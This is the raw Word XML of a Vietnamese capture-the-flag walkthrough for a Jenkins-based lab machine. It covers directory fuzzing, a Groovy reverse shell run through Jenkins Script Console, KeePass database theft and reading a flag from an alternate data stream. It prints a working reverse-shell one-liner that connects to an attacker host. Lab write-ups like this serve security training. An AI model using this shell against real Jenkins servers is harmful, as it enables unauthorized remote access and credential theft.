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5BD4A" w14:textId="79A56C54" w:rsidR="002F49FE" w:rsidRDefault="00211CCE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F0DCEA9" wp14:editId="2C63544A">
            <wp:extent cx="5943600" cy="2726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D5D" w14:textId="74227385" w:rsidR="00211CCE" w:rsidRDefault="00211CCE"/>
    <w:p w14:paraId="68B6B43E" w14:textId="55B7A8D8" w:rsidR="00211CCE" w:rsidRDefault="008F399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Mình ffuf bằng </w:t>
      </w:r>
      <w:r w:rsidR="00FB6DD2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wordlists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6DD2" w:rsidRPr="00FB6DD2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory-list-2.3-medium.txt</w:t>
      </w:r>
      <w:r w:rsidR="00FB6DD2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> trang http://10.10.10.63:50000 ra được thư mục askjeeves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D53A05" w14:textId="6F845DA0" w:rsidR="00FB6DD2" w:rsidRDefault="00FB6DD2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4408B35E" w14:textId="03B4A5AC" w:rsidR="00960CA6" w:rsidRDefault="00960CA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diện trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44447BE5" w14:textId="1251D3D1" w:rsidR="00960CA6" w:rsidRDefault="00960CA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6837A14F" w14:textId="5F4D92EA" w:rsidR="00960CA6" w:rsidRDefault="0088356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225223C" wp14:editId="0DB7CD59">
            <wp:extent cx="5267624" cy="2155009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5" t="17002" r="3471" b="24969"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269210" cy="215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1511" w14:textId="23D702E5" w:rsidR="00883565" w:rsidRDefault="00883565">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A96DD3E" w14:textId="13C801F5" w:rsidR="00883565" w:rsidRDefault="00C8035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Trong Manage Jenkins có Script Console, bạn có thể thực thi tập lệnh Groovy</w:t>
      </w:r>
      <w:r w:rsidR="00A0223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để reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFFCBAC" w14:textId="4235841D" w:rsidR="00156F42" w:rsidRDefault="00156F42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1A257A" w14:textId="7904978F" w:rsidR="00156F42" w:rsidRDefault="00156F4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037391E" wp14:editId="5926F024">
            <wp:extent cx="5279390" cy="2895207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8" t="17292" r="3099" b="4754"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5280416" cy="289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2CB7F" w14:textId="16B5C279" w:rsidR="00C80351" w:rsidRDefault="00C80351">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F24ED5" w14:textId="50B010DB" w:rsidR="00C80351" w:rsidRPr="00156F42" w:rsidRDefault="00C80351">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00156F42">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String host="10.10.14.7";int port=1234;String cmd="cmd";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()&gt;0)so.write(pi.read());while(pe.available()&gt;0)so.write(pe.read());while(si.available()&gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D837BB3" w14:textId="082D4937" w:rsidR="00C80351" w:rsidRDefault="00C80351">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5E6586" w14:textId="77777777" w:rsidR="00C80351" w:rsidRDefault="00C80351">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D949F17" w14:textId="356DCE7E" w:rsidR="00FB6DD2" w:rsidRDefault="00242B5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5D5D824" wp14:editId="68626488">
            <wp:extent cx="5943600" cy="1733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8B9E" w14:textId="60D4100D" w:rsidR="00231985" w:rsidRDefault="00231985">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4278B2E4" w14:textId="64121780" w:rsidR="00231985" w:rsidRDefault="0023198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AE88883" wp14:editId="2CAE0A11">
            <wp:extent cx="405130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68A9" w14:textId="4DE7E918" w:rsidR="00041E45" w:rsidRDefault="00041E45">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E6256B" w14:textId="257F6D0D" w:rsidR="00041E45" w:rsidRDefault="00156F4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EA51892" wp14:editId="656D19B0">
            <wp:extent cx="4025900" cy="723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45B8" w14:textId="0E10FFC5" w:rsidR="00156F42" w:rsidRDefault="00156F42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D30DF7D" w14:textId="2D1AE8BA" w:rsidR="00A87859" w:rsidRDefault="00A878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Trong thư mục của kohsuke có tập tin </w:t>
      </w:r>
      <w:r w:rsidR="00050F9A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KeePass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8CF67" w14:textId="7C5EE8D4" w:rsidR="00156F42" w:rsidRDefault="00A8785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9C5DFC" wp14:editId="1E67C583">
            <wp:extent cx="5143500" cy="25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153C" w14:textId="70968153" w:rsidR="00050F9A" w:rsidRDefault="00050F9A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EC47E2" w14:textId="3F89ACDA" w:rsidR="00050F9A" w:rsidRDefault="00044FF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Tập tin KDBX là 1 cơ sở dữ liệu chứa mật khẩu được tạo bởi KeePass Password Safe, 1 trình quản lý mật khẩu của Windows. Nó lưu trữ 1 cơ sở dữ liệu chứa mật khẩu được mã hóa chỉ có thể xem bằng master password được đặt bởi người dùng</w:t>
      </w:r>
      <w:r w:rsidR="001D2A5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB90336" w14:textId="23A95EA8" w:rsidR="006E07E0" w:rsidRDefault="006E07E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A12BBF" w14:textId="2FD428FD" w:rsidR="006E07E0" w:rsidRDefault="006E07E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Vận chuyển tập tin kdbx đến máy của kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79354E72" w14:textId="77777777" w:rsidR="006E07E0" w:rsidRDefault="006E07E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF432C8" w14:textId="17BCE432" w:rsidR="001D2A5C" w:rsidRDefault="006E07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D59029" wp14:editId="10DE69B3">
            <wp:extent cx="37719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00C5" w14:textId="77777777" w:rsidR="006E07E0" w:rsidRDefault="006E07E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF74D04" w14:textId="62D8DCC5" w:rsidR="006E07E0" w:rsidRDefault="006E07E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49A4DE1" wp14:editId="5BA84B52">
            <wp:extent cx="5943600" cy="2261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2868" w14:textId="654AC1F3" w:rsidR="001D2A5C" w:rsidRDefault="001D2A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFF6E3A" w14:textId="1B84A5AB" w:rsidR="00CD0680" w:rsidRDefault="00DE09B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DF8DF52" wp14:editId="78DFADC3">
            <wp:extent cx="5311775" cy="31895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9" t="11721" r="3109" b="2406"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5312513" cy="318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44B6A" w14:textId="4D5E077C" w:rsidR="00E13886" w:rsidRDefault="00E13886">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B52020E" w14:textId="3DB0E805" w:rsidR="00E13886" w:rsidRDefault="00C907C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Bài có nhiều mật khẩu lắ</w:t>
      </w:r>
      <w:r w:rsidR="00B51E8B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>m chỉ có bảng Backup stuff là quan trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDFD541" w14:textId="4C050590" w:rsidR="00267A96" w:rsidRDefault="00267A96">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6DAB24" w14:textId="005CD694" w:rsidR="00717F78" w:rsidRDefault="00B51E8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23A878" wp14:editId="061A5D8F">
            <wp:extent cx="5943600" cy="18243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AEE8" w14:textId="3C840476" w:rsidR="0016460F" w:rsidRDefault="0016460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Không có flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A40DC14" w14:textId="2FAC0254" w:rsidR="0016460F" w:rsidRDefault="0016460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5AFA29" wp14:editId="1B02B5E0">
            <wp:extent cx="5943600" cy="2914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3B9" w14:textId="3B256E8E" w:rsidR="0016460F" w:rsidRDefault="0016460F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260F1182" w14:textId="6817447D" w:rsidR="0016460F" w:rsidRDefault="000F15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Có một luồng dữ liệu khác đối với tập tin hm.txt, có thể khám phá bằng lệnh dir /R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB6E0A" w14:textId="4EA94E6C" w:rsidR="00F5313B" w:rsidRDefault="00F5313B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50326870" w14:textId="3DE5C866" w:rsidR="00F5313B" w:rsidRDefault="00F5313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5A898E6" wp14:editId="608DE061">
            <wp:extent cx="5943600" cy="2459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BEC2" w14:textId="2648CCE1" w:rsidR="00F5313B" w:rsidRDefault="00F5313B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E8A02A" w14:textId="2BAA3CE1" w:rsidR="00F5313B" w:rsidRDefault="00F3572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Đọc luồng dữ liệu bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE4DC5" w14:textId="1D2A43BA" w:rsidR="00F35729" w:rsidRDefault="00F35729">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79750325" w14:textId="430698B5" w:rsidR="00F35729" w:rsidRPr="00316191" w:rsidRDefault="00F35729" w:rsidP="00F35729">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00316191">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell Get-Content -Path "hm.txt"</w:t>
      </w:r>
      <w:r w:rsidRPr="00316191">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00316191">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-Stream "root.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D2095" w14:textId="4B77E33F" w:rsidR="00316191" w:rsidRDefault="00316191" w:rsidP="00F35729">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5155D01C" w14:textId="052AD467" w:rsidR="00316191" w:rsidRPr="008F399B" w:rsidRDefault="00316191" w:rsidP="00F357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23143C" wp14:editId="3D5BB7DA">
            <wp:extent cx="5943600" cy="732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191" w:rsidRPr="008F39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CF7"/>
    <w:rsid w:val="00041E45"/>
    <w:rsid w:val="00044FFF"/>
    <w:rsid w:val="00050F9A"/>
    <w:rsid w:val="000F1590"/>
    <w:rsid w:val="00156F42"/>
    <w:rsid w:val="0016460F"/>
    <w:rsid w:val="001D2A5C"/>
    <w:rsid w:val="00211CCE"/>
    <w:rsid w:val="00231985"/>
    <w:rsid w:val="00242B5F"/>
    <w:rsid w:val="00267A96"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00316191"/>
    <w:rsid w:val="005049E2"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006E07E0"/>
    <w:rsid w:val="00717F78"/>
    <w:rsid w:val="00883565"/>
    <w:rsid w:val="008F399B"/>
    <w:rsid w:val="00960CA6"/>
    <w:rsid w:val="009D7207"/>
    <w:rsid w:val="00A0223D"/>
    <w:rsid w:val="00A87859"/>
    <w:rsid w:val="00B51E8B"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C80351"/>
    <w:rsid w:val="00C907C6"/>
    <w:rsid w:val="00CD0680"/>
    <w:rsid w:val="00DE09B2"/>
    <w:rsid w:val="00E13886"/>
    <w:rsid w:val="00F35729"/>
    <w:rsid w:val="00F5313B"/>
    <w:rsid w:val="00F80CF7"/>
    <w:rsid w:val="00FB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09D6438"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E0AA5BAE-655B-DA4A-8258-F8E04FAE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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-16T02:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-16T04:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>